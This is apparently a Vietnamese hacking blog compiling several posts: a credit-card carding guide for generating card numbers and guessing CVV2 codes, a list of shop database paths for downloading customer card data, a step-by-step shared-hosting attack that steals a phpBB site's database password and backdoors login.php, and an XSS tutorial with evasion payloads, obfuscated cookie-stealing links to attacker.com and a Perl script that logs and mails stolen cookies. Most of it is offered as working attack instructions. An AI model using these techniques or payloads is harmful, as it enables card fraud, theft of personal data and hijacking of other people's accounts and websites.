+ số cuối cùng là 7 thì cộng thêm 3 để thành 10
+ số cuối cùng là 8 thì cộng thêm 2 để thành 10
+ số cuối cùng là 9 thì cộng thêm 1 để thành 10
+ số cuối cùng là 0 thì cộng thêm 0 để thành 0 =è chú ý chỗ này
+ số cuối cùng là 1 thì cộng thêm 9 để thành 10
Nói chung là cộng thêm số nào đó để nó thành số chẵn là 10
Vậy cái số bí mật cần tìm chính là con số được cộng thêm vào.
Trong ví dụ này, đó chính là con số 8.
Vậy số Y cần tìm là 8
Số Number Card là 5204 1234 5678 9018

Cách tìm số Veryfind Number hay còn gọI là CVV2
Đây là một dãy số gồm 3 số (American Express) hay 4 số (Visa Card, Master Card và Discover Card). Những số này có thể tạm hiểu là những con số bí mật, nó giống như câu trả lời cho cây hỏi khi bạn quên Pass của mail Yahoo hay Hotmail vậy đó. Những con số này được IN trên thẻ tín dụng, chúng ta đâu có thẻ này đâu mà có thể biết được những con số này là gì.
Tuy nhiên tại một Server chat ở mIRC, người ta có thể Check và đưa ra kết quả cho bạn về CVV2 này. Tôi đã kiểm chứng rất nhiều kết quả CVV2 có được do họ Check thì chưa bao giờ thành công. Tôi cũng đã chat vớI Admin, FD…nói chung là những người làm ra con BOT để check CVV2 thì chính họ cũng xác nhận là “không thành công”, họ nói rằng lúc được, lúc không, chính họ cũng không biết …họ vẫn đang tiếp tục nghiên cứu vấn đề này…..hic hic hic :( :( :(
server: irc.dal.net
port 6667
room: #thacc, #thecc, #!chk, …
Cách này tôi không dám đảm bảo tính chính xác của nó vì chính các Admin của #room đã trả lờI như vậy rồI mà.
Sau một thờI gian dài nghiên cứu cách tính CVV2 của họ, cuối cùng tôi cũng thành công là tìm ra “quy luật” tính CVV2 của những con BOTs trong #thacc, #thecc ….
Khi bạn vào những #room đó, bạn có thể gõ lệnh
!command {gõ enter} để biết những lệnh mà con BOTs của #room đó sẽ làm việc như thế nào.
!cvv2 numbercard expdate {gõ enter} (nhớ có khoảng trắng)
!cvv2 số_card ngày_hết_hạn {gõ enter} (nhớ có khoảng trắng)
!cvv2 3456354511117432 0104 {gõ enter}
!cvv2 4017140180542018 0702 {gõ enter}
!cvv2 5459180008179595 0604 {gõ enter}
!cvv2 6013559110422697 1003 {gõ enter}
Lúc đó các bạn sẽ nhận được câu trả lờI là:
3456354511117432 is Amex, cvv2: 5516
4017140180542018 is Visa, cvv2: 142
5459180008179595 is MasterCard, cvv2: 076
6013559110422697 is Discover, cvv2: 122
Vậy thì họ đã tính CVV2 như thế nào ?
+ ĐốI vớI Amex thì dùng những con số nằm ở thứ tự như sau: 6,8,12,3+1
3456354511117432
3456354511117432
3456354511117432
34(5+1)6354511117432
Con số cuối cùng của CVV2 thường cộng thêm 1
+ ĐốI vớI Visa, Master và Discover thì áp dụng cùng 1 quy luật: 8,12,3+1
4017140180542018
4017140180542018
40(1+1)7140180542018
==è CVV2 là 142
Chú ý:
Giả sử con số thứ 3 của dãy Card là số 9
4090 xxxx xxxx xxxx : CVV2 là xx1
4094 xxxx xxxx xxxx : CVV2 là xx1
4897 xxxx xxxx xxxx : CVV2 là xx1
5191 xxxx xxxx xxxx : CVV2 là xx1
ví dụ:
4897 1234 5678 9012 : CVV2 là 481
Tức là ta không cần phải cộng thêm 1 ở con số hàng thứ 3 như những trường hợp khác mà ta “gán” cho nó bằng 1

Một số vấn đề khác của Credit Card.
a. 4271-382A-xxxx-xxxx - Citibank Preferred Visa
Đây là Card do ngân hàng Citibank Preferred Visa phát hành, Card này được nhận dạng qua 7 con số đầu tiên chứ không phảI 4 số như các loại khác.
b. Gold Card - Diners Club - Card NoLimit
30xx xxxx xxxx xxxx - Diners Club
31xx xxxx xxxx xxxx - Diners Club
35xx xxxx xxxx xxxx - Diners Club
36xx xxxx xxxx xxxx - Diners Club
….
Những loại Card này có Ưu điểm đó là No Limit, tức là nó không hạn chế số tiền bạn muốn chi xài trong một tháng là bao nhiêu cả. Những Card khác thì tuỳ ngư ời chủ sở hữu Card quy định, có thể là 500$/1tháng, 1000$/1tháng hay 2000$/1tháng …
Những Gold Card, Diners Club này thường là của những ông chủ giàu có. Và những Card này thư ờng là của Amex. Card Amex thường là Card NoLimit
c. Card 4063 xxxx xxxx xxxx
Đây là Card mới phát hành và Limit mỗI tháng của nó là 2000$

Còn nhiều vấn đề khác cần phảI quan tâm và nghiên cứu nũa, nhưng trình độ có hạn cũng như hiện tại tôi không có Computer cũng như điều kiện tài chính nên không thể nghiên cứu hết các vấn đề khác như:
a. Tính toán ngày hết hạn Expdate
b. Kiểm tra Card có bị Decline (hết giá trị hay bị clock) hay vẫn còn Valid (còn dùng)
c. Tìm hiểu và nghiên cứu cách tính CVV2 thay cho cách tính của BOTs ở trên.
d. Tôi chưa kiểm chứng và làm thí nghiệm nhiều trên loại Card 13 chữ số.
e. Các bạn nào giỏI lập trình có thể dựa vào những ý tưởng đó để viết một chương
trình keygen và tính toán Card.

The Police and the Prison are waitting for you….he he he.
Welcome to the Prison…..ha ha ha.
BYE BYE BYE

Kèm theo bài viết này là một chương trình của nước ngoài để giúp các bạn Test Card mình tạo ra có đúng như trong bài viết đã hướng dẫn hay không, ngoài ra nó cũng còn có một số tiện ích khác ..các bạn tự nghiên cứu.

Thứ Năm, 15 tháng 8, 2013

on Leave a Comment

SalesCart Database Storage Insecurity

 

SalesCart Database Storage Insecurity :

Tổng quát : Lỗi này thực chất là dữ liệu của các chương trình mua bán không được bảo mật , mã hóa hay cất giữ cẩn thận => Bạn hoàn toàn có thể lấy chúng một cách dễ dàng
.
Lưu ý : Đôi khi với thực tế , 1 số link có thể khác đi . Không phải lúc nào cũng hoàn toàn đúng.
Dữ liệu có khi bao gồm cả CRD ( Credit Card ) nên mọi việc phải qua proxy ( nếu không có proxy thì có thể ra dịch vụ ...)
Khai thác :
Hãy sử dụng 1 trong những link sau :
www.victim.com/fpdb/shop.mdb
www.victim.com/shoponline/fpdb/shop.mdb
www.victim.com/database/metacart.mdb
www.victim.com/shopping/database/metacart.mdb
www.victim.com/shop/database/metacart.mdb
www.victim.com/metacart/database/metacart.mdb
www.victim.com/mcartfree/database/metacart.mdb
www.victim.com/ASP/cart/database/metacart.mdb
--------------------
Có nghĩa là database không hề có 1 chút bảo mật nào cả . Download vô tư . Trong database có thể bao gồm : name, surname, address, e-mail, phone number, credit card
number, and company name . Bạn có thể khai thác dữ liệu này . Nhưng trong thực tế , mọi việc không phải lúc nào cũng suôn sẽ cả . Bạn hãy tưởng tượng mỗi server có một cấu trúc riêng . ví dụ như đường dẫn không phải lúc nào cũng là fpdb/... hay như những link trên . Hãy tận dụng lỗi và thử từng cái một , nhiều khi là www.victim.com/muaban/fpdb/shop.mdb thì sao ? Cứ thử đi .. rồi bạn sẽ khai thác được nhiều

Thứ Tư, 14 tháng 8, 2013

on Leave a Comment

Hack Local Site

 


Hack Local Site, vd : Hack forum PhpBB :
###### Header Begin
Project Name: How to hack a localsite
Founder: Luke/Lukos                        
Found day: 31/08/2002
Use for Education and Experiences Only
###### Header End
Rất tình cờ, khi học PHP tôi tìm ra một cách để hack được một số Web Portal hoặc forum của hầu hết các free hosting như lycos.co.uk vv. Và tỉ lệ thành công là 100% tuy hơi mất thời gian
Trước hết cách này gần như kiểu hack qua Local Exploit để lấy Root's passwd, cái này chắc nhiều bạn cũng đã biết nhưng cũng khác chút ít. Vì vậy tôi cũng chỉ xin lấy một ví dụ là hack phpBB forum để làm mẫu chung cho các kiểu Portal hay forum khác.
Bước 1. Xác định URL website cần hack.
Do đây là free hosting nên website luôn có dạng http://root/yoursite
Và giả sử forum phpBB nằm tại URL sau http://root/victim/phpBB_path/
Chú ý là phải tìm đúng URL Root chứ không phải redirect hay forward ..
Bước 2. Đăng kí một hosting cùng trên server đó.
Vì đây là free hosting nên nếu victim đăng kí được thì bạn cũng có thể đăng kí dễ dàng
Giả sử bạn đăng kí một hosting như sau http://root/mysite/
Bước 3 Xác định DB info của Victim
Điều này rất dơn giản khi bạn với victim đang cùng trên một Local
Thật vậy có thể là /home/user_root/public_html/mysite/ hay /home/user_root/httpdocs/mysite/ tuỳ thuộc Control Panel của Server là lọai gì (Cpanel, Plesk, Enxim..). Nhưng điều này không cần chú ý.
3.1 Bạn tạo một file để lấy DB info của victim như sau
## getdb.php begin
<?php
$fd = fopen ("../victim/phpBB_path/config.php", "r");
while (!feof ($fd)) {
$line = fgets($fd,4000);
print $line;
}
fclose ($fd);
?>
## getdb.php end
Bạn có thể thay $fd bằng đường dẫn tới bất kì file php mà bạn muốn xem mã nguồn của nó. Vì đối với các loại Portal hoặc forum khác có thể DB Info không chứa trong file config.php như của phpBB
3.2 Upload file getdb.php
Bạn chỉ việc upload lên hosting mà bạn vừa đăng kí http://root/mysite/getdb.php
3.3 Lấy DB info của victim
Chạy file getdb.php vừa rồi trên Browser của bạn. Bạn sẽ thấy một màn hình trắng (blank). Đừng lo, bạn hãy "View source" và bạn sẽ thấy được các thông tin như sau :
## getdb.php's source begin
<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## getdb.php's source end
Xong bước thứ 3
Bước 4. Kiểm tra mật khẩu mà bạn vừa lấy được.
Với nick Admin trong forum và tất cả những gì có thể liên quan như passwd e-mail, hosting, domain .. Vì có thể nạn nhân dùng 1 passwd cho tất cả những mật khẩu của mình cho đỡ quên. Đây là một trong những thói quen chết người
Nếu mà thành công thì dừng tại đây nếu không hãy sang bước thứ 5
Bước 5. Tạo một mirror phpBB forum.
5.1 Nghĩa là sao, bạn hãy upload một phpBB forum cùng phiên bản với victim vào hosting của bạn http://root/mysite/
Và đừng Install forum này nếu bạn muốn hack nó.
5.2 Config forum vừa upload
Bạn hãy config cho forum của bạn thực sự là một mirror của victim's forum.
Điều đó có nghĩa là bạn phải link DB đến DB của victim, điều đó thật dễ dàng khi bạn đã có được DB info của victim trong tay.
5.2.1 Tạo file config.php
Đó là toàn bộ những gì bạn vừa "view source" được :
## config.php source begin
<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## config.php source end
5.2.2 Upload config.php
Bạn upload đè lên file config.php trong cái forum mới toanh mà bạn vừa upload.
http://root/mysite/config.php
5.2.3 Thử lại
Bạn thử gõ http://root/mysite/ xem, nếu mà forum của bạn có các thông số y hệt như của http://root/victim/phpBB_path tức là bạn đã thành công bước này
Bước 6. Sửa mã nguồn Mirror Site
Mục đích bước này là bạn sẽ sửa mã nguồn forum của bạn đề bạn có thể Login vào được Admin panel của nó. Nếu bạn học PHP thì việc này khá dễ dàng.
Tôi xin nêu ra 1 phương pháp, đó là cách crack cổ điển.
6.1 Crack cổ điển
6.1.1
Đó là khi bạn muốn crack passwd 1 file exe, bạn có thể deassebler nó ra thành file.asm bằng nhiều chương trình hiện nay
6.1.2
Tìm các lệnh nhảy có điều kiện (JP gì gì đó. Cái này có hàng đống mà). của đoạn code dòi mật khẩu
6.1.3
Sửa thành lệnh nhảy không điều kiên
6.1.4
Compile lại thành file exe và OK. Ta nhập bất cứ mật khẩu nào vào nó cũng chấp nhận
6.2 Sửa mã nguồn
Sửa ở file login.php và sẽ cho phép bạn Login dưới mọi nickname bằng 1 passwd chọn sẵn
6.2.1 Chọn mật khẩu chung cho toàn bộ các nick.
Thực sự các mật khẩu trong phpBB đã được mà hoá theo kiểu MD5, do đó có thể rất khó khăn để  có thể giải mã nó. Nếu các bạn hiểu rõ về kiểu encode này thì các bạn có thể tự tìm cho mình mật khẩu thích hợp, nếu không các bạn có thể sử dụng mật khẩu đã được tôi giải mã là: "hainam@hainam.org"
Cái địa chỉ mail của tôi ấy mà, khi mật khẩu này được mã hoá theo MD5 nó sẽ là một mật khẩu như sau  "692e2c95b693cf6fbec8ea5c40536b9e"
hainam@hainam.org => 692e2c95b693cf6fbec8ea5c40536b9e
6.2.2 Thiết lập mật khẩu chung cho toàn bộ các nick
Trước hết bạn mở file login.php ra tìm đoạn sau :
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
## file login.php ..
Chèn thêm biến $hack = "692e2c95b693cf6fbec8ea5c40536b9e";
Tức là sửa đoanj mã đó thành
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
$hack = "692e2c95b693cf6fbec8ea5c40536b9e";
## file login.php ..
Tiếp đó tìm đoạn mã sau
## file login.php ..
else
{
if( md5($password) == $row['user_password'] && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Sửa đoạn mã đó thành
## file login.php ..
else
{
if( md5($password) == $hack && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Ghi lại file login.php
Bước 7.Login User với mật khẩu đã chọn
Bây giờ bạn có thể login vào diễn đàn qua website của bạn http://root/mysite/login.php với bất cứ nickname nào bằng mật khẩu mà bạn đã chọn. Ở đây là "hainam@hainam.org" kể cả là nick Admin, và vào được Admin Panel ..
Chú ý rằng ở website của bạn thì User chỉ có thể login với mật khẩu là hainam@hainam.org chứ không thể bằng bât kì mật khẩu khác kể cả đó là mật khẩu đúng
Tổng quát :

I/Phương Pháp
-Đây là một ví dụ cho việc hack các website khi trong một local, không chỉ riêng đối với phpBB mà có thể áp dụng được cho nhiều Portal hay forum khác, tuy nhiên để có thể hack được từng loại bạn đều phải hiểu rất kĩ về nó và tránh lạm dụng quá đáng.
-Cách hack này tuy mất nhiều thời gian trong việc upload một mirror nhưng rất hiệu quả. Tuy nhiên tuyệt đối không nên sử dụng chúng lung tung và bừa bãi.
-Các hosting cho phép free, điều đó chứng tỏ họ rất tốt bụng, cũng chính vì vậy cũng không nên sử dụng phương pháp này khi KHÔNG THỰC SỰ cần thiết
II/Ví dụ.
-Trước hết tôi xin lỗi những ai đã làm website **** vì tôi sẽ đưa website của các bạn ra làm ví dụ và đã là victim đầu tiên của tôi.
-Mong các bạn, những người đang muốn học hỏi thêm một chút kinh nghiệm chỉ tham qua chứ không lạm dụng gi để làm hỏng DataBase của họ, thực sự tôi đã backup nhưng tôi cũng rất ngại restore lại. Hơn nữa để đảm bảo cho các bài viết tiếp theo không bị phản đối, tôi mong mọi người hãy tôn trọng ý kiến của tôi, KHÔNG PHÁ PHÁCH GÌ DB CỦA VICTIM và mang mục đích học hỏi và tham khảo lên hang đầu.
-Website mirror của website**** là **** , tại đây các bạn có thể login vào bất cứ nickname nào trong diễn đàn **** với mật khẩu chung là "hainam@hainam.org" . hãy nhớ là KHÔNG NÊN PHÁ DB CỦA HỌ, chi nên tham khảo
III/Kinh nghiệm
Điều quan trọng không phải là chúng ta hack được những cái gì mà là chúng ta học được những cái gì. Qua bài viết này mong các bạn nắm rõ được một số thao tác sau
-Đọc mã nguồn của một file bất kì trên website khi đã cùng một server (Bước 3)
-Kinh nghiệm về mật khẩu, dò tìm và ghi nhớ (Bước 4)
-Cách tạo một mirror website hay là cách link DB cho nhiều website (Bước 5)
-Cách crack cổ điển bằng ASM (Bước 6.1)
Các bạn nên tìm ra các mối liên hệ giữa các Portal, Forum, Guest Book, Chatroom PHP-CGI,.. để có thể áp dụng phương pháp này. Mặt khác các bạn cũng có thể hack được ngay cả đối với các domain hosting chứ không phải là các site có dạng http://root/yoursite/ . Và Các Paid hosting cũng không ngaọi trừ khả năng bị hack nếu các hacker đã thực sự muốn hack và sẵn sang bỏ tiền mua một hosting trên cùng một Server. Phần hack paid hosting và domain tôi xin để cho các bạn tự tìm hiểu. Hãy nhớ rằng luôn luôn phải chú ý đến URL Root của mỗi hosting. Ví dụ như ở Cpanel thì URL Root cho các  domain hosting l? http://[ip/ Server]/~user .vv
Chúc các bạn thành công
Bài viết của Lukos

Thứ Ba, 13 tháng 8, 2013

on Leave a Comment

Kinh nghiem cho cac Hacker

 


Hacker làm gì để hack 1 trang Web :
<1> Các bug , vulnerability ... đã được công bố trên toàn cầu nhưng chưa chắc site đã patch . Hãy thử những bug mới nhất của công nghệ đang dùng của site đó .
<2> Admin không phải lúc nào cũng cẩn thận , đôi khi họ sai lầm . Và tôi đúc kết những điều sau :
<a> CHMOD : nhiều khi file config của forum không được CHMOD và dẫn đến dễ dàng xem được nó . Thông thường đối với 1 số site bảo mật kém thì password của MYSQL thường trùng với pass của FTP Account . Ta dễ dàng deface .
<b> TROJAN , KEYLOGGER : 1 công cụ khá đơn giản nhưng hiệu nghiệm , nếu admin sơ xuất disable NAV thì thứ này sẽ giúp ta có những info đặc biệt quan trọng về máy chủ .
<c> Password default : Thứ dễ dàng này đôi khi rất hiệu nghiệm . Admin mới setup xong server . Và sơ ý chưa change password default hoặc biết nhưng không đổi là điều kiện cho bạn attack hay deface .
<3> ANON FTP : Bài này bác KHA hướng dẫn khá cụ thể . Tôi xin nói vấn tắt . 1 số server cho đăng nhập FTP nặc danh . Tức là user " khách " . 1 số site cho phép user guest hay anon này upload hay download . Hãy tận dụng .
Tôi đã điểm qua sơ lược 1 vài kinh nghiệm của tôi . Hy vọng các bạn sẽ áp dụng được trong thực tế và sáng tạo những cách hay hơn ...
--------------------

Thứ Hai, 12 tháng 8, 2013

on Leave a Comment

Cross Site Scripting

 

Cross Site Scripting :

Ngày nay! các lỗ hổng Cross Site Scripting (XSS) ngày càng được phát hiện nhiều ở các dịch vụ đại chúng nổi tiếng như: Yahoo, Hotmail, Ebay...
Cộng đồng các Hacker và Security đã chứng minh và có nhiều cuộc trình diễn về về sự nguy hiểm của XSS bên trong các dịch vụ đại chúng nổi tiếng như: Yahoo, Hotmail, Ebay và một số sản phẩm được ưa chuộng như: Apache, Tomcat, IIS, Lotus Domino. Các lỗ hổng XSS này cho phép các Hacker có thể dễ dàng đánh cắp User của người dùng trên các ứng dụng Web.
Nhưng để thực hiện được một cuộc tấn công XSS thì đòi hỏi các Hacker phải có một khả năng nhất định. Đầu tiên các Hacker sẽ cố gắng đánh cắp Cookies của người sử dụng vào đúng thời điểm mà người sử dụng đó đăng nhập đến các dịch vụ ứng dụng Web.
Gần như tất cả các dịch vụ Web đại chúng đều sử dụng Cookies để liên kết các tài khoản với người sử dụng. Điển hình là các dịch vụ Webmail như: Yahoo, Hotmail, Netscape...Và cả các dịch vụ ngân hàng, thương mại điện tử cũng sử dụng Cookies cho mục đích chứng thực và cấp phép.
Trong một kịch bản đăng nhập vào của các ứng dụng Web. Có 2 Token chứng thực được yêu cầu trao đổi. Nó chính là Username và Password...2 giá trị này được lưu giữ bên trong Cookies, sau đó được sử dụng như một dấu hiệu chứng thực duy nhất. Vậy để đánh cắp được User và Password cuat nạn nhân. Thì trước hết bạn phải đánh cắp được Cookies của họ. Các Hacker thường sử dụng và khai thác tính dễ tổn thương XSS để ăn cắp Cookies của người dùng trên Internet.
Các Hacker cũng có thể gián tiếp sử dụng các kỹ thuật khác để thực hiện công việc này: chẳng hạn như từ Cahe DNS, các Bug từ trình duyệt Internet của bạn, hay sử dụng một Trojan. Một khi các Cookies được bị đánh cắp. Các Hacker có thể khai thác các thông tin quý giá lưu trên Cookies và bắt đầu hướng các hoạt động đến các Server Web Application. Bắt đầu tấn công đến tài khoản của nạn nhân. Nếu thàhh công các Hacker có thể toàn quyền sử dụng và điều khiển các tài khoản ứng dụng trên Web của bạn.
Chúng ta bắt đầu tìm hiểu về các cuộc tấn công XSS:
Bản thân XSS là viết tắt của (Cross Site Scripting). Nếu một dịch vụ Web có chứa tính tổn thương XSS nó cho phép các Hacker có thể gửi các dữ liệu hiểm độc tới nạn nhân hoặc xuyên qua các ứng dụng đó. Các Hacker thường thực hiện khai thác tính dễ tổn thương XSS bằng kỹ xảo sử dụng các URL hiểm độc hay lợi dụng sự sơ hở của nạn nhân để đánh lừa họ. Những URL này rất đa dạng về ngôn ngữ: (VBScript, Javascript...etc) và chúng sẽ được Excute ngay trên trình duyệt của nạn nhân.
Tính tổn thương XSS được xảy ra bởi một sự bất thường trong các ứng dụng Web khi xử lý các giá trị đầu vào của người dùng. Dưới đây là một ví dụ về tính dễ tổn thương của XSS được khai thác bằng cách nhúng JavaScript, nó sẽ được thực thi trên trình duyệt của nạn nhân cùng với sự cho phép của dịch vụ Web dễ tổn thương:
http://www.microsoft.com/education/?ID=MCTN&target=http://www.microsoft.com/education/?ID=MCTN&target="><script>alert(document.cookie)</script>
http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<script>alert(‘Test’);</script>
http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cookie)</script>&frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
Các dịch vụ Web phần lớn sử dụng ngôn ngữ CGI. Thật ra thì nạn nhân không cần thiết phải Click vào một Link. Code XSS cũng có thể được tải tự động trong một E-mail dưới định dạng HTML khi nạn nhân đọc Mail (thường là 2 Tag: IMG hay FRAME HTML - Badtrans Worm là một ví dụ điển hình). Có rất nhiều cách để trèn mã JavaScript vào một URL cho mục đích khai thác tính dễ tổn thương của XSS. Cross Site là một bộ phận của XSS sẽ tham chiếu tới những sự hạn chế an toàn mà bộ trình duyệt mạng thông thường có liên quan đến dữ liệu với các Website động (sử dụng DHTML). Bởi việc thực hiện các Script trên trình duyệt của nạn nhân cùng với sự cho phép của ứng dụng Web đó. Các Hacker có thể vượt qua Document Object Model (DOM). Lợi dụng sự sơ hở này các Hacker sẽ đánh cắp Cookies và đột nhập vào các tài khoản của bạn. DOM là một Framework cho phép thực hiện những kịch bản để làm thay đổi nội dụng của những trang Web động.

Như đã nói! các Hacker có thể lợi dụng tính dễ tổn thương của XSS để đánh cắp Cookies của người sử dụng. Bởi việc trèn các Script hiểm độc, các Hacker có thể nắm quyền điều khiển bộ trình duyệt cuar nạn nhân. Họ sẽ lợi dụng tính dễ tổn thương trong trình duyệt của nạn nhân để dành quyền truy cập tới hệ điều hành của họ. Một đoạn Code ví dụ:
<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="java script:[code]">
<img dynsrc="java script:[code]">
<input type="image" dynsrc="java script:[code]">
<bgsound src="java script:[code]">
&<script>[code]</script>
&{[code]};
<img src=&{[code]};>
<link rel="stylesheet" href="java script:[code]">
<iframe src="vbscript :[code]">
<img src="mocha:[code]">
<img src="livescript:[code]">
<a href="about :<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=java script:[code]">
<body onload="[code]">
<div style="background-image: url(java script:[code]);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression([code]);">
<style type="text/javascript">[code]</style>
<object classid="clsid:..." codebase="java script:[code]">
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="java script:[code]">
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script>
Bạn có thể tham khảo thêm thông tin ở:
http://www.cgisecurity.com/articles/xss-faq.shtml
http://www.w3.org/DOM/
A Tradition XSS Power Hjack
Để thực hiện một phiên đánh cướp (Hjack) các Hacker thường sự dụng bộ chụp gói tin (Sniffer), các công cụ bẻ khoá (Brute Force)...Thông dụng và phù hợp hơn cả vẫn là cách đánh cắp Cookies để nắm quyền điều khiển một phiên ứng dụng mạng của một người dùng hợp pháp trong khi người dùng đăng nhập vào hệ thống mạng ứng dụng. Thông thường thì kẻ tấn công thường thực hiện tất cả các chức năng ứng dụng của mạng với cùng đặc quyền của người sử dụng hợp pháp đó. Dưới đây là các bước được Hacker sử dụng để đánh cắp Cookies của người sử dụng hợp pháp
- Một người sử dụng đăng nhập vào hệ thống ứng dụng Web của họ, một phiên làm việc đã được thiết lập. Các Hacker biết về tính dễ tổn thương của hệ thống ứng dụng Web đó.
- Hacker sẽ gửi các mã XSS hiểm độc đến nạn nhân thông qua E-mail dưới định dạng HTML hay qua một trang Web trung gian. Trong một vài trường hợp các Hacker có thể nhúng chúng vào các nội dung Web phổ biến như Guest Book, Form Mail...các mã hiểm độc này sẽ được tự động thực thi trên trình duyệt của nạn nhân mà không cần sự cho phép của họ. Lấy ví dụ: tính dễ tổn thương trong http://hotwried.lycos.com Có đoạn Code sau:
<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a
href="http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<
script>document.location.replace('http://attacker.com/steal.cgi?'+docum
ent.cookie);</script>"> Check this CNN story out! </a>
</body>
</html>

Đoạn Script trên sẽ dẫn nạn nhân đến một trang có chứa CGI Script của kẻ tấn công và tại đây nó sẽ đánh cắp Cookies của nạn nhân. Nó sẽ có dạng như sau:
http://attacker.com/steal.cgi?lubid=010000508BD3046103F43B8264530098C20 100000000;%20p_uniqid=8sJgk9daas7WUMxV0B;%20gv_tit
an_20=5901=1019511286
Hay các Hacker cũng có thể đanh lừa nạn nhân bằng đoạn Code sau:
<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a
href="http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<
script>document.location.replace('http://attacker.com/steal.cgi?'+docum
ent.cookie);</script>"
onMouseOver="window.status='http://www.cnn.com/2002/SHOWBIZ/News/05/02/
clinton.talkshow.reut/index.html';return true"
onMouseOut="window.status='';return true"> Check this CNN story out!
</a>
</body>
</html>
Tuy nhiên nếu để đoạn Code đó lộ thiên như vậy sẽ rất khó lừa nạn nhân cũng như cơ chế lọc của các dịch vụ ứng dụng Web. Chính vì vậy lên các Hacker thường mã hoá chúng lại theo chuẩn ASCII (American Standar Code Information Interchance):
<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a
href="http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<
script>var u = String.fromCharCode(0x0068);u %2B=
String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x003A);
u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x0061);u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0061);
u %2B= String.fromCharCode(0x0063);u %2B= String.fromCharCode(0x006B);
u %2B= String.fromCharCode(0x0065);u %2B= String.fromCharCode(0x0072);
u %2B= String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x006F);u %2B= String.fromCharCode(0x006D);
u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0073);
u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0065);
u %2B= String.fromCharCode(0x0061);u %2B= String.fromCharCode(0x006C);
u %2B= String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x0067);u %2B= String.fromCharCode(0x0069);
u %2B= String.fromCharCode(0x003F);u %2B=
document.cookie;document.location.replace(u);</script>"
onMouseOver="window.status='http://www.cnn.com/2002/SHOWBIZ/News/05/02/
clinton.talkshow.reut/index.html';return true"
onMouseOut="window.status='';return true"> Check this CNN story out!
</a>
</body>
</html>
- Khi các đoạn Script này được thực hiện trên trình duyệt của người dùng hay được tự động thực thi trên trong E-mail của nạn nhân. Nó sẽ tự động Load các Tag như IMG, HTML FRAME (img src ="script.js"> hay <iframe = "script.js">. Khi đoạn Code Java Script đó được thực hiện (có thể sử dụng các ngôn ngữ khác) thì nó sẽ bị trang Web chứa Code CGI của Hacker đánh cắp. Cookies sẽ có dạng như sau:
http://attacker.com/steal.cgi? lubid=01000000F81038F953EB3C41EB340000585500000000
;%20p
_uniqid=8s51F99ZdNn/n27HtA
Giá trị Cookies ở đây chính là: lubid=01000000F81038F953EB3C41EB340000585500000000
;%20p
_uniqid=8s51F99ZdNn/n27HtA
- Các Hacker thương sử dụng một số đoạn Code để đánh cắp Cookies của nạn nhân và sử dụng giá trị Cookies đó ngay trên trình duyệt của mình. Đoạn Code Perl sau sẽ giúp các Hacker thực hiện điều đó:
#!/usr/bin/perl
# steal.cgi by David Endler dendler@idefense.com
# Specific to your system
$mailprog = '/usr/sbin/sendmail';
# create a log file of cookies, we’ll also email them too
open(COOKIES,”>>stolen_cookie_file”);
# what the victim sees, customize as needed
print "Content-type:text/html\n\n";
print <<EndOfHTML;
<html><head><title>Cookie Stealing</title></head>
<body>
Your Cookie has been stolen. Thank you.
</body></html>
EndOfHTML
# The QUERY_STRING environment variable should be filled with
# the cookie text after steal.cgi:
# http://www.attacker.com/steal.cgi?XXXXX
print COOKIES “$ENV{'QUERY_STRING'} from $ENV{‘REMOTE_ADDR’}\n”;
# now email the alert as well so we can start to hijack
open(MAIL,"|$mailprog -t");
print MAIL "To: attacker\@attacker.com\n";
print MAIL "From: cookie_steal\@attacker.com\n";
print MAIL "Subject: Stolen Cookie Submission\n\n";
print MAIL "-" x 75 . "\n\n";
